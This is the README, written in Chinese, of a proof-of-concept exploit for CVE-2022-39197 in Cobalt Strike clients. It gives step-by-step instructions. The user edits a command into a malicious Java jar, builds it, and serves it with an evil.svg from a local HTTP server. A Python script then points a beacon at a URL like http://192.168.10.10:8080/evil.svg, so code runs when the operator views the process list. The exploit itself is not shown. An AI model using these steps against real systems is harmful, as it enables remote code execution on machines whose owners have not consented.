
CVE-2022-39197 RCE POC
本项目改编自 @its-arun 的项目 https://github.com/its-arun/CVE-2022-39197
在我测试该脚本时,发现 frida 脚本无法按正常顺序查询数据。这里采用修改 frida 脚本来修改进程名的方法。
感谢 @Kai5174 大师对利用方法所做的贡献。
1、在 EvilJar/src/main/java/Exploit.java 中编辑你的 payload 要执行的命令,目前它只能弹出计算器。
2、使用 jar 构建:mvn clean compile assembly:single
4、将 EvilJar-1.0-jar-with-dependencies.jar 从 EvilJar/target/ 移动到 serve/ 文件夹
5、编辑 serve\evil.svg,替换 [attacker]
6、使用 python3 -m http.server 8080 提供服务
7、使用小于或等于 4.7 版本的 C2 生成 beacon.exe
8、你需要在 Windows 上执行 py 脚本才能上线,并在客户端访问进程列表、看到 beacon.exe 进程时采取反制措施。
python3 -m pip install -r requirements.txt
python3 cve-2022-39197_Yyy.py beacon.exe http://192.168.10.10:8080/evil.svg
用户滚动浏览进程列表(Process List)时,Payload 就会被触发。
Windows

Mac

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — 这里有对该漏洞非常深入的分析 https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html